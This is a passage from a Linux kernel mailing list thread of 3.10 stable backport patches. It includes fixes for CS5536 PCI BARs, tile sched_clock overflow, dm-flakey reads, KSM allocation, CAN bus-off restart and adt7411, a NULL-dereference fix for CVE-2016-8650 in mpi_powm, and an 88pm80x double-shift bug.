hardware defect.  There's a workaround in quirk_cs5536_vsa(), but it no
longer works after 36e8164882ca ("PCI: Restore detection of read-only
BARs").  Prior to 36e8164882ca, we filled in res->start; afterwards we
leave it zeroed out.  The quirk only updated the size, so the driver tried
to use a region starting at zero, which didn't work.

Expand quirk_cs5536_vsa() to read the base addresses from the BARs and
hard-code the sizes.

On Nix's system BAR 2's read-only value is 0x6200.  Prior to 36e8164882ca,
we interpret that as a 512-byte BAR based on the lowest-order bit set.  Per
datasheet sec 5.6.1, that BAR (MFGPT) requires only 64 bytes; use that to
avoid clearing any address bits if a platform uses only 64-byte alignment.

[js] pcibios_bus_to_resource takes pdev, not bus in 3.12

[bhelgaas: changelog, reduce BAR 2 size to 64]
Fixes: 36e8164882ca ("PCI: Restore detection of read-only BARs")
Link: https://bugzilla.kernel.org/show_bug.cgi?id=85991#c4
Link: http://support.amd.com/TechDocs/31506_cs5535_databook.pdf
Link: http://support.amd.com/TechDocs/33238G_cs5536_db.pdf
Reported-and-tested-by: Nix <nix@esperi.org.uk>
Signed-off-by: Myron Stowe <myron.stowe@redhat.com>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/pci/quirks.c | 41 +++++++++++++++++++++++++++++++++++++----
 1 file changed, 37 insertions(+), 4 deletions(-)

diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
index a663715..b6625e5 100644
--- a/drivers/pci/quirks.c
+++ b/drivers/pci/quirks.c
@@ -339,19 +339,52 @@ static void quirk_s3_64M(struct pci_dev *dev)
 DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_S3,	PCI_DEVICE_ID_S3_868,		quirk_s3_64M);
 DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_S3,	PCI_DEVICE_ID_S3_968,		quirk_s3_64M);
 
+static void quirk_io(struct pci_dev *dev, int pos, unsigned size,
+		     const char *name)
+{
+	u32 region;
+	struct pci_bus_region bus_region;
+	struct resource *res = dev->resource + pos;
+
+	pci_read_config_dword(dev, PCI_BASE_ADDRESS_0 + (pos << 2), &region);
+
+	if (!region)
+		return;
+
+	res->name = pci_name(dev);
+	res->flags = region & ~PCI_BASE_ADDRESS_IO_MASK;
+	res->flags |=
+		(IORESOURCE_IO | IORESOURCE_PCI_FIXED | IORESOURCE_SIZEALIGN);
+	region &= ~(size - 1);
+
+	/* Convert from PCI bus to resource space */
+	bus_region.start = region;
+	bus_region.end = region + size - 1;
+	pcibios_bus_to_resource(dev, res, &bus_region);
+
+	dev_info(&dev->dev, FW_BUG "%s quirk: reg 0x%x: %pR\n",
+		 name, PCI_BASE_ADDRESS_0 + (pos << 2), res);
+}
+
 /*
  * Some CS5536 BIOSes (for example, the Soekris NET5501 board w/ comBIOS
  * ver. 1.33  20070103) don't set the correct ISA PCI region header info.
  * BAR0 should be 8 bytes; instead, it may be set to something like 8k
  * (which conflicts w/ BAR1's memory range).
+ *
+ * CS553x's ISA PCI BARs may also be read-only (ref:
+ * https://bugzilla.kernel.org/show_bug.cgi?id=85991 - Comment #4 forward).
  */
 static void quirk_cs5536_vsa(struct pci_dev *dev)
 {
+	static char *name = "CS5536 ISA bridge";
+
 	if (pci_resource_len(dev, 0) != 8) {
-		struct resource *res = &dev->resource[0];
-		res->end = res->start + 8 - 1;
-		dev_info(&dev->dev, "CS5536 ISA bridge bug detected "
-				"(incorrect header); workaround applied.\n");
+		quirk_io(dev, 0,   8, name);	/* SMB */
+		quirk_io(dev, 1, 256, name);	/* GPIO */
+		quirk_io(dev, 2,  64, name);	/* MFGPT */
+		dev_info(&dev->dev, "%s bug detected (incorrect header); workaround applied\n",
+			 name);
 	}
 }
 DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_CS5536_ISA, quirk_cs5536_vsa);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 308/319] tile: avoid using clocksource_cyc2ns with absolute cycle count
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (206 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 307/319] PCI: Handle read-only BARs on AMD CS553x devices Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 309/319] dm flakey: fix reads to be issued if drop_writes configured Willy Tarreau
                   ` (10 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Chris Metcalf, Willy Tarreau

From: Chris Metcalf <cmetcalf@mellanox.com>

commit e658a6f14d7c0243205f035979d0ecf6c12a036f upstream.

For large values of "mult" and long uptimes, the intermediate
result of "cycles * mult" can overflow 64 bits.  For example,
the tile platform calls clocksource_cyc2ns with a 1.2 GHz clock;
we have mult = 853, and after 208.5 days, we overflow 64 bits.

Since clocksource_cyc2ns() is intended to be used for relative
cycle counts, not absolute cycle counts, performance is more
importance than accepting a wider range of cycle values.  So,
just use mult_frac() directly in tile's sched_clock().

Commit 4cecf6d401a0 ("sched, x86: Avoid unnecessary overflow
in sched_clock") by Salman Qazi results in essentially the same
generated code for x86 as this change does for tile.  In fact,
a follow-on change by Salman introduced mult_frac() and switched
to using it, so the C code was largely identical at that point too.

Peter Zijlstra then added mul_u64_u32_shr() and switched x86
to use it.  This is, in principle, better; by optimizing the
64x64->64 multiplies to be 32x32->64 multiplies we can potentially
save some time.  However, the compiler piplines the 64x64->64
multiplies pretty well, and the conditional branch in the generic
mul_u64_u32_shr() causes some bubbles in execution, with the
result that it's pretty much a wash.  If tilegx provided its own
implementation of mul_u64_u32_shr() without the conditional branch,
we could potentially save 3 cycles, but that seems like small gain
for a fair amount of additional build scaffolding; no other platform
currently provides a mul_u64_u32_shr() override, and tile doesn't
currently have an <asm/div64.h> header to put the override in.

Additionally, gcc currently has an optimization bug that prevents
it from recognizing the opportunity to use a 32x32->64 multiply,
and so the result would be no better than the existing mult_frac()
until such time as the compiler is fixed.

For now, just using mult_frac() seems like the right answer.

Signed-off-by: Chris Metcalf <cmetcalf@mellanox.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 arch/tile/kernel/time.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/arch/tile/kernel/time.c b/arch/tile/kernel/time.c
index 5ac397e..9df6d0d 100644
--- a/arch/tile/kernel/time.c
+++ b/arch/tile/kernel/time.c
@@ -215,8 +215,8 @@ void do_timer_interrupt(struct pt_regs *regs, int fault_num)
  */
 unsigned long long sched_clock(void)
 {
-	return clocksource_cyc2ns(get_cycles(),
-				  sched_clock_mult, SCHED_CLOCK_SHIFT);
+	return mult_frac(get_cycles(),
+			 sched_clock_mult, 1ULL << SCHED_CLOCK_SHIFT);
 }
 
 int setup_profiling_timer(unsigned int multiplier)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 309/319] dm flakey: fix reads to be issued if drop_writes configured
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (207 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 308/319] tile: avoid using clocksource_cyc2ns with absolute cycle count Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 310/319] mm,ksm: fix endless looping in allocating memory when ksm enable Willy Tarreau
                   ` (9 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Mike Snitzer, Willy Tarreau

From: Mike Snitzer <snitzer@redhat.com>

commit 299f6230bc6d0ccd5f95bb0fb865d80a9c7d5ccc upstream.

v4.8-rc3 commit 99f3c90d0d ("dm flakey: error READ bios during the
down_interval") overlooked the 'drop_writes' feature, which is meant to
allow reads to be issued rather than errored, during the down_interval.

Fixes: 99f3c90d0d ("dm flakey: error READ bios during the down_interval")
Reported-by: Qu Wenruo <quwenruo@cn.fujitsu.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/md/dm-flakey.c | 27 ++++++++++++++++-----------
 1 file changed, 16 insertions(+), 11 deletions(-)

diff --git a/drivers/md/dm-flakey.c b/drivers/md/dm-flakey.c
index a9a47cd..ace01a3 100644
--- a/drivers/md/dm-flakey.c
+++ b/drivers/md/dm-flakey.c
@@ -286,15 +286,13 @@ static int flakey_map(struct dm_target *ti, struct bio *bio)
 		pb->bio_submitted = true;
 
 		/*
-		 * Map reads as normal only if corrupt_bio_byte set.
+		 * Error reads if neither corrupt_bio_byte or drop_writes are set.
+		 * Otherwise, flakey_end_io() will decide if the reads should be modified.
 		 */
 		if (bio_data_dir(bio) == READ) {
-			/* If flags were specified, only corrupt those that match. */
-			if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == READ) &&
-			    all_corrupt_bio_flags_match(bio, fc))
-				goto map_bio;
-			else
+			if (!fc->corrupt_bio_byte && !test_bit(DROP_WRITES, &fc->flags))
 				return -EIO;
+			goto map_bio;
 		}
 
 		/*
@@ -331,14 +329,21 @@ static int flakey_end_io(struct dm_target *ti, struct bio *bio, int error)
 	struct flakey_c *fc = ti->private;
 	struct per_bio_data *pb = dm_per_bio_data(bio, sizeof(struct per_bio_data));
 
-	/*
-	 * Corrupt successful READs while in down state.
-	 */
 	if (!error && pb->bio_submitted && (bio_data_dir(bio) == READ)) {
-		if (fc->corrupt_bio_byte)
+		if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == READ) &&
+		    all_corrupt_bio_flags_match(bio, fc)) {
+			/*
+			 * Corrupt successful matching READs while in down state.
+			 */
 			corrupt_bio_data(bio, fc);
-		else
+
+		} else if (!test_bit(DROP_WRITES, &fc->flags)) {
+			/*
+			 * Error read during the down_interval if drop_writes
+			 * wasn't configured.
+			 */
 			return -EIO;
+		}
 	}
 
 	return error;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 310/319] mm,ksm: fix endless looping in allocating memory when ksm enable
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (208 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 309/319] dm flakey: fix reads to be issued if drop_writes configured Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 311/319] can: dev: fix deadlock reported after bus-off Willy Tarreau
                   ` (8 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: zhong jiang, Andrew Morton, Linus Torvalds, Willy Tarreau

From: zhong jiang <zhongjiang@huawei.com>

commit 5b398e416e880159fe55eefd93c6588fa072cd66 upstream.

I hit the following hung task when runing a OOM LTP test case with 4.1
kernel.

Call trace:
[<ffffffc000086a88>] __switch_to+0x74/0x8c
[<ffffffc000a1bae0>] __schedule+0x23c/0x7bc
[<ffffffc000a1c09c>] schedule+0x3c/0x94
[<ffffffc000a1eb84>] rwsem_down_write_failed+0x214/0x350
[<ffffffc000a1e32c>] down_write+0x64/0x80
[<ffffffc00021f794>] __ksm_exit+0x90/0x19c
[<ffffffc0000be650>] mmput+0x118/0x11c
[<ffffffc0000c3ec4>] do_exit+0x2dc/0xa74
[<ffffffc0000c46f8>] do_group_exit+0x4c/0xe4
[<ffffffc0000d0f34>] get_signal+0x444/0x5e0
[<ffffffc000089fcc>] do_signal+0x1d8/0x450
[<ffffffc00008a35c>] do_notify_resume+0x70/0x78

The oom victim cannot terminate because it needs to take mmap_sem for
write while the lock is held by ksmd for read which loops in the page
allocator

ksm_do_scan
	scan_get_next_rmap_item
		down_read
		get_next_rmap_item
			alloc_rmap_item   #ksmd will loop permanently.

There is no way forward because the oom victim cannot release any memory
in 4.1 based kernel.  Since 4.6 we have the oom reaper which would solve
this problem because it would release the memory asynchronously.
Nevertheless we can relax alloc_rmap_item requirements and use
__GFP_NORETRY because the allocation failure is acceptable as ksm_do_scan
would just retry later after the lock got dropped.

Such a patch would be also easy to backport to older stable kernels which
do not have oom_reaper.

While we are at it add GFP_NOWARN so the admin doesn't have to be alarmed
by the allocation failure.

Link: http://lkml.kernel.org/r/1474165570-44398-1-git-send-email-zhongjiang@huawei.com
Signed-off-by: zhong jiang <zhongjiang@huawei.com>
Suggested-by: Hugh Dickins <hughd@google.com>
Suggested-by: Michal Hocko <mhocko@suse.cz>
Acked-by: Michal Hocko <mhocko@suse.com>
Acked-by: Hugh Dickins <hughd@google.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 mm/ksm.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/mm/ksm.c b/mm/ksm.c
index 7bf748f..d1b19b9 100644
--- a/mm/ksm.c
+++ b/mm/ksm.c
@@ -283,7 +283,8 @@ static inline struct rmap_item *alloc_rmap_item(void)
 {
 	struct rmap_item *rmap_item;
 
-	rmap_item = kmem_cache_zalloc(rmap_item_cache, GFP_KERNEL);
+	rmap_item = kmem_cache_zalloc(rmap_item_cache, GFP_KERNEL |
+						__GFP_NORETRY | __GFP_NOWARN);
 	if (rmap_item)
 		ksm_rmap_items++;
 	return rmap_item;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 311/319] can: dev: fix deadlock reported after bus-off
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (209 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 310/319] mm,ksm: fix endless looping in allocating memory when ksm enable Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 312/319] hwmon: (adt7411) set bit 3 in CFG1 register Willy Tarreau
                   ` (7 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Sergei Miroshnichenko, Marc Kleine-Budde, Willy Tarreau

From: Sergei Miroshnichenko <sergeimir@emcraft.com>

commit 9abefcb1aaa58b9d5aa40a8bb12c87d02415e4c8 upstream.

A timer was used to restart after the bus-off state, leading to a
relatively large can_restart() executed in an interrupt context,
which in turn sets up pinctrl. When this happens during system boot,
there is a high probability of grabbing the pinctrl_list_mutex,
which is locked already by the probe() of other device, making the
kernel suspect a deadlock condition [1].

To resolve this issue, the restart_timer is replaced by a delayed
work.

[1] https://github.com/victronenergy/venus/issues/24

Signed-off-by: Sergei Miroshnichenko <sergeimir@emcraft.com>
Signed-off-by: Marc Kleine-Budde <mkl@pengutronix.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/can/dev.c   | 27 +++++++++++++++++----------
 include/linux/can/dev.h |  3 ++-
 2 files changed, 19 insertions(+), 11 deletions(-)

diff --git a/drivers/net/can/dev.c b/drivers/net/can/dev.c
index 464e5f6..284d751 100644
--- a/drivers/net/can/dev.c
+++ b/drivers/net/can/dev.c
@@ -22,6 +22,7 @@
 #include <linux/slab.h>
 #include <linux/netdevice.h>
 #include <linux/if_arp.h>
+#include <linux/workqueue.h>
 #include <linux/can.h>
 #include <linux/can/dev.h>
 #include <linux/can/skb.h>
@@ -394,9 +395,8 @@ EXPORT_SYMBOL_GPL(can_free_echo_skb);
 /*
  * CAN device restart for bus-off recovery
  */
-static void can_restart(unsigned long data)
+static void can_restart(struct net_device *dev)
 {
-	struct net_device *dev = (struct net_device *)data;
 	struct can_priv *priv = netdev_priv(dev);
 	struct net_device_stats *stats = &dev->stats;
 	struct sk_buff *skb;
@@ -436,6 +436,14 @@ restart:
 		netdev_err(dev, "Error %d during restart", err);
 }
 
+static void can_restart_work(struct work_struct *work)
+{
+	struct delayed_work *dwork = to_delayed_work(work);
+	struct can_priv *priv = container_of(dwork, struct can_priv, restart_work);
+
+	can_restart(priv->dev);
+}
+
 int can_restart_now(struct net_device *dev)
 {
 	struct can_priv *priv = netdev_priv(dev);
@@ -449,8 +457,8 @@ int can_restart_now(struct net_device *dev)
 	if (priv->state != CAN_STATE_BUS_OFF)
 		return -EBUSY;
 
-	/* Runs as soon as possible in the timer context */
-	mod_timer(&priv->restart_timer, jiffies);
+	cancel_delayed_work_sync(&priv->restart_work);
+	can_restart(dev);
 
 	return 0;
 }
@@ -472,8 +480,8 @@ void can_bus_off(struct net_device *dev)
 	priv->can_stats.bus_off++;
 
 	if (priv->restart_ms)
-		mod_timer(&priv->restart_timer,
-			  jiffies + (priv->restart_ms * HZ) / 1000);
+		schedule_delayed_work(&priv->restart_work,
+				      msecs_to_jiffies(priv->restart_ms));
 }
 EXPORT_SYMBOL_GPL(can_bus_off);
 
@@ -556,6 +564,7 @@ struct net_device *alloc_candev(int sizeof_priv, unsigned int echo_skb_max)
 		return NULL;
 
 	priv = netdev_priv(dev);
+	priv->dev = dev;
 
 	if (echo_skb_max) {
 		priv->echo_skb_max = echo_skb_max;
@@ -565,7 +574,7 @@ struct net_device *alloc_candev(int sizeof_priv, unsigned int echo_skb_max)
 
 	priv->state = CAN_STATE_STOPPED;
 
-	init_timer(&priv->restart_timer);
+	INIT_DELAYED_WORK(&priv->restart_work, can_restart_work);
 
 	return dev;
 }
@@ -599,8 +608,6 @@ int open_candev(struct net_device *dev)
 	if (!netif_carrier_ok(dev))
 		netif_carrier_on(dev);
 
-	setup_timer(&priv->restart_timer, can_restart, (unsigned long)dev);
-
 	return 0;
 }
 EXPORT_SYMBOL_GPL(open_candev);
@@ -615,7 +622,7 @@ void close_candev(struct net_device *dev)
 {
 	struct can_priv *priv = netdev_priv(dev);
 
-	del_timer_sync(&priv->restart_timer);
+	cancel_delayed_work_sync(&priv->restart_work);
 	can_flush_echo_skb(dev);
 }
 EXPORT_SYMBOL_GPL(close_candev);
diff --git a/include/linux/can/dev.h b/include/linux/can/dev.h
index fb0ab65..fb9fbe2 100644
--- a/include/linux/can/dev.h
+++ b/include/linux/can/dev.h
@@ -31,6 +31,7 @@ enum can_mode {
  * CAN common private data
  */
 struct can_priv {
+	struct net_device *dev;
 	struct can_device_stats can_stats;
 
 	struct can_bittiming bittiming;
@@ -42,7 +43,7 @@ struct can_priv {
 	u32 ctrlmode_supported;
 
 	int restart_ms;
-	struct timer_list restart_timer;
+	struct delayed_work restart_work;
 
 	int (*do_set_bittiming)(struct net_device *dev);
 	int (*do_set_mode)(struct net_device *dev, enum can_mode mode);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 312/319] hwmon: (adt7411) set bit 3 in CFG1 register
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (210 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 311/319] can: dev: fix deadlock reported after bus-off Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 313/319] mpi: Fix NULL ptr dereference in mpi_powm() [ver #3] Willy Tarreau
                   ` (6 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Michael Walle, Willy Tarreau

From: Michael Walle <michael@walle.cc>

commit b53893aae441a034bf4dbbad42fe218561d7d81f upstream.

According to the datasheet you should only write 1 to this bit. If it is
not set, at least AIN3 will return bad values on newer silicon revisions.

Fixes: d84ca5b345c2 ("hwmon: Add driver for ADT7411 voltage and temperature sensor")
Signed-off-by: Michael Walle <michael@walle.cc>
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/hwmon/adt7411.c | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/drivers/hwmon/adt7411.c b/drivers/hwmon/adt7411.c
index d9299dee..dddaa16 100644
--- a/drivers/hwmon/adt7411.c
+++ b/drivers/hwmon/adt7411.c
@@ -30,6 +30,7 @@
 
 #define ADT7411_REG_CFG1			0x18
 #define ADT7411_CFG1_START_MONITOR		(1 << 0)
+#define ADT7411_CFG1_RESERVED_BIT3		(1 << 3)
 
 #define ADT7411_REG_CFG2			0x19
 #define ADT7411_CFG2_DISABLE_AVG		(1 << 5)
@@ -292,8 +293,10 @@ static int adt7411_probe(struct i2c_client *client,
 	mutex_init(&data->device_lock);
 	mutex_init(&data->update_lock);
 
+	/* According to the datasheet, we must only write 1 to bit 3 */
 	ret = adt7411_modify_bit(client, ADT7411_REG_CFG1,
-				 ADT7411_CFG1_START_MONITOR, 1);
+				 ADT7411_CFG1_RESERVED_BIT3
+				 | ADT7411_CFG1_START_MONITOR, 1);
 	if (ret < 0)
 		return ret;
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 313/319] mpi: Fix NULL ptr dereference in mpi_powm() [ver #3]
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (211 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 312/319] hwmon: (adt7411) set bit 3 in CFG1 register Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 314/319] mfd: 88pm80x: Double shifting bug in suspend/resume Willy Tarreau
                   ` (5 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Andrey Ryabinin, David Howells, Dmitry Kasatkin, linux-ima-devel,
	James Morris, Willy Tarreau

From: Andrey Ryabinin <aryabinin@virtuozzo.com>

commit f5527fffff3f002b0a6b376163613b82f69de073 upstream.

This fixes CVE-2016-8650.

If mpi_powm() is given a zero exponent, it wants to immediately return
either 1 or 0, depending on the modulus.  However, if the result was
initalised with zero limb space, no limbs space is allocated and a
NULL-pointer exception ensues.

Fix this by allocating a minimal amount of limb space for the result when
the 0-exponent case when the result is 1 and not touching the limb space
when the result is 0.

This affects the use of RSA keys and X.509 certificates that carry them.

BUG: unable to handle kernel NULL pointer dereference at           (null)
IP: [<ffffffff8138ce5d>] mpi_powm+0x32/0x7e6
PGD 0
Oops: 0002 [#1] SMP
Modules linked in:
CPU: 3 PID: 3014 Comm: keyctl Not tainted 4.9.0-rc6-fscache+ #278
Hardware name: ASUS All Series/H97-PLUS, BIOS 2306 10/09/2014
task: ffff8804011944c0 task.stack: ffff880401294000
RIP: 0010:[<ffffffff8138ce5d>]  [<ffffffff8138ce5d>] mpi_powm+0x32/0x7e6
RSP: 0018:ffff880401297ad8  EFLAGS: 00010212
RAX: 0000000000000000 RBX: ffff88040868bec0 RCX: ffff88040868bba0
RDX: ffff88040868b260 RSI: ffff88040868bec0 RDI: ffff88040868bee0
RBP: ffff880401297ba8 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000047 R11: ffffffff8183b210 R12: 0000000000000000
R13: ffff8804087c7600 R14: 000000000000001f R15: ffff880401297c50
FS:  00007f7a7918c700(0000) GS:ffff88041fb80000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000000 CR3: 0000000401250000 CR4: 00000000001406e0
Stack:
 ffff88040868bec0 0000000000000020 ffff880401297b00 ffffffff81376cd4
 0000000000000100 ffff880401297b10 ffffffff81376d12 ffff880401297b30
 ffffffff81376f37 0000000000000100 0000000000000000 ffff880401297ba8
Call Trace:
 [<ffffffff81376cd4>] ? __sg_page_iter_next+0x43/0x66
 [<ffffffff81376d12>] ? sg_miter_get_next_page+0x1b/0x5d
 [<ffffffff81376f37>] ? sg_miter_next+0x17/0xbd
 [<ffffffff8138ba3a>] ? mpi_read_raw_from_sgl+0xf2/0x146
 [<ffffffff8132a95c>] rsa_verify+0x9d/0xee
 [<ffffffff8132acca>] ? pkcs1pad_sg_set_buf+0x2e/0xbb
 [<ffffffff8132af40>] pkcs1pad_verify+0xc0/0xe1
 [<ffffffff8133cb5e>] public_key_verify_signature+0x1b0/0x228
 [<ffffffff8133d974>] x509_check_for_self_signed+0xa1/0xc4
 [<ffffffff8133cdde>] x509_cert_parse+0x167/0x1a1
 [<ffffffff8133d609>] x509_key_preparse+0x21/0x1a1
 [<ffffffff8133c3d7>] asymmetric_key_preparse+0x34/0x61
 [<ffffffff812fc9f3>] key_create_or_update+0x145/0x399
 [<ffffffff812fe227>] SyS_add_key+0x154/0x19e
 [<ffffffff81001c2b>] do_syscall_64+0x80/0x191
 [<ffffffff816825e4>] entry_SYSCALL64_slow_path+0x25/0x25
Code: 56 41 55 41 54 53 48 81 ec a8 00 00 00 44 8b 71 04 8b 42 04 4c 8b 67 18 45 85 f6 89 45 80 0f 84 b4 06 00 00 85 c0 75 2f 41 ff ce <49> c7 04 24 01 00 00 00 b0 01 75 0b 48 8b 41 18 48 83 38 01 0f
RIP  [<ffffffff8138ce5d>] mpi_powm+0x32/0x7e6
 RSP <ffff880401297ad8>
CR2: 0000000000000000
---[ end trace d82015255d4a5d8d ]---

Basically, this is a backport of a libgcrypt patch:

	http://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=patch;h=6e1adb05d290aeeb1c230c763970695f4a538526

Fixes: cdec9cb5167a ("crypto: GnuPG based MPI lib - source files (part 1)")
Signed-off-by: Andrey Ryabinin <aryabinin@virtuozzo.com>
Signed-off-by: David Howells <dhowells@redhat.com>
cc: Dmitry Kasatkin <dmitry.kasatkin@gmail.com>
cc: linux-ima-devel@lists.sourceforge.net
Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 lib/mpi/mpi-pow.c | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/lib/mpi/mpi-pow.c b/lib/mpi/mpi-pow.c
index 5464c87..e24388a 100644
--- a/lib/mpi/mpi-pow.c
+++ b/lib/mpi/mpi-pow.c
@@ -64,8 +64,13 @@ int mpi_powm(MPI res, MPI base, MPI exp, MPI mod)
 	if (!esize) {
 		/* Exponent is zero, result is 1 mod MOD, i.e., 1 or 0
 		 * depending on if MOD equals 1.  */
-		rp[0] = 1;
 		res->nlimbs = (msize == 1 && mod->d[0] == 1) ? 0 : 1;
+		if (res->nlimbs) {
+			if (mpi_resize(res, 1) < 0)
+				goto enomem;
+			rp = res->d;
+			rp[0] = 1;
+		}
 		res->sign = 0;
 		goto leave;
 	}
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 314/319] mfd: 88pm80x: Double shifting bug in suspend/resume
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (212 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 313/319] mpi: Fix NULL ptr dereference in mpi_powm() [ver #3] Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 315/319] ASoC: omap-mcpdm: Fix irq resource handling Willy Tarreau
                   ` (4 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Dan Carpenter, Lee Jones, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit 9a6dc644512fd083400a96ac4a035ac154fe6b8d upstream.

set_bit() and clear_bit() take the bit number so this code is really
doing "1 << (1 << irq)" which is a double shift bug.  It's done
consistently so it won't cause a problem unless "irq" is more than 4.

Fixes: 70c6cce04066 ('mfd: Support 88pm80x in 80x driver')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/mfd/88pm80x.h | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/include/linux/mfd/88pm80x.h b/include/linux/mfd/88pm80x.h
index e94537b..b55c95d 100644
--- a/include/linux/mfd/88pm80x.h
+++ b/include/linux/mfd/88pm80x.h
@@ -345,7 +345,7 @@ static inline int pm80x_dev_suspend(struct device *dev)
 	int irq = platform_get_irq(pdev, 0);
 
 	if (device_may_wakeup(dev))
-		set_bit((1 << irq), &chip->wu_flag);
+		set_bit(irq, &chip->wu_flag);
 
 	return 0;
 }
@@ -357,7 +357,7 @@ static inline int pm80x_dev_resume(struct device *dev)
 	int irq = platform_get_irq(pdev, 0);
 
 	if (device_may_wakeup(dev))
-		clear_bit((1 << irq), &chip->wu_flag);
+		clear_bit(irq, &chip->wu_flag);
 
 	return 0;
 }
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 315/319] ASoC: omap-mcpdm: Fix irq resource handling
